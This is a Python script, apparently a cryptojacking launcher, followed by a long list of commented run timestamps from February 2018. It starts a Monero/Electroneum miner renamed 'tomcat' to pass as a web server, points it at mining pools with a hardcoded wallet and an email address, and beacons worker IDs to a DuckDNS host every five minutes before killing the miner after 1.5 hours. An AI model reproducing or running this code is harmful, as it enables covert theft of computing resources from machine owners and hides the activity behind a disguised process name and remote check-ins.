import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:39:01.628363
#2018-02-17 17:27:06.823232
#2018-02-17 19:17:01.321233
#2018-02-17 21:06:01.831619
#2018-02-17 22:50:04.587243
#2018-02-18 00:35:03.967834
#2018-02-18 02:26:02.215449
#2018-02-18 04:14:01.453226
#2018-02-18 06:04:05.191481
#2018-02-18 07:53:05.074720
#2018-02-18 09:40:07.740931
#2018-02-18 11:26:05.723579
#2018-02-18 13:12:07.632317
#2018-02-18 15:01:06.529644
#2018-02-18 16:49:01.655977
#2018-02-18 18:37:06.114952
#2018-02-18 20:25:07.603890
#2018-02-18 22:11:03.738655
#2018-02-18 23:59:06.050069
#2018-02-19 01:46:01.985036
#2018-02-19 03:33:05.688361
#2018-02-19 05:18:05.323443
#2018-02-19 07:04:07.809813
#2018-02-19 08:53:04.204537
#2018-02-19 10:42:07.314642
#2018-02-19 12:29:01.803998
#2018-02-19 14:16:07.224309
#2018-02-19 16:05:10.922639
#2018-02-19 17:54:07.431664
#2018-02-19 19:41:08.472891
#2018-02-19 21:30:07.756873
#2018-02-19 23:16:08.507496
#2018-02-20 01:04:05.371881
#2018-02-20 02:53:06.397021
#2018-02-20 04:41:03.919760
#2018-02-20 06:25:08.471037
#2018-02-20 08:10:01.575484
#2018-02-20 09:55:07.935964
#2018-02-20 11:40:07.329558
#2018-02-20 13:27:10.341842
#2018-02-20 15:13:03.930332
#2018-02-20 16:57:01.264675
#2018-02-20 18:45:02.937189
#2018-02-20 20:38:04.549177
#2018-02-20 22:24:07.241482
#2018-02-21 00:05:02.095171
#2018-02-21 01:51:07.125131
#2018-02-21 03:41:05.955665
#2018-02-21 05:28:05.119341
#2018-02-21 07:17:05.534169
#2018-02-21 09:02:06.679589
#2018-02-21 10:50:12.159823
#2018-02-21 12:37:07.315826
#2018-02-21 14:24:03.927138
#2018-02-21 16:11:05.686191
#2018-02-21 18:01:04.286945
#2018-02-21 19:49:08.399474
#2018-02-21 21:37:04.043290
#2018-02-21 23:23:01.277548
#2018-02-22 01:11:01.967485
#2018-02-22 02:58:01.684215
#2018-02-22 04:45:09.208234
#2018-02-22 06:31:05.822440
#2018-02-22 08:18:05.625797
#2018-02-22 10:07:04.715540
#2018-02-22 11:52:04.235571
#2018-02-22 13:37:09.098532
#2018-02-22 15:25:01.267657
#2018-02-22 17:12:01.645789
#2018-02-22 18:57:02.276195
#2018-02-22 20:48:05.540369
#2018-02-22 22:33:08.111177
#2018-02-23 00:21:04.329900
#2018-02-23 02:09:07.782936
#2018-02-23 03:57:06.174583
#2018-02-23 05:46:06.967407
#2018-02-23 07:35:05.903231
#2018-02-23 09:38:01.564941
#2018-02-23 11:41:05.305808
#2018-02-23 13:29:07.887132
#2018-02-23 15:16:02.103762
#2018-02-23 17:04:01.797158
#2018-02-23 18:52:07.353415
#2018-02-23 20:38:02.078919
#2018-02-23 22:25:06.793881
#2018-02-24 00:09:07.081034
#2018-02-24 02:01:06.550704
#2018-02-24 03:51:07.045077
#2018-02-24 05:37:06.279266
#2018-02-24 07:24:06.858592
#2018-02-24 09:14:04.616835
#2018-02-24 11:11:01.576520
#2018-02-24 12:59:06.813738
#2018-02-24 14:47:03.217486
#2018-02-24 16:39:01.651947
#2018-02-24 18:27:01.945202
#2018-02-24 20:14:01.525278
#2018-02-24 22:03:06.091971
#2018-02-25 01:01:05.592208
#2018-02-25 04:47:04.194592
#2018-02-25 09:04:01.650326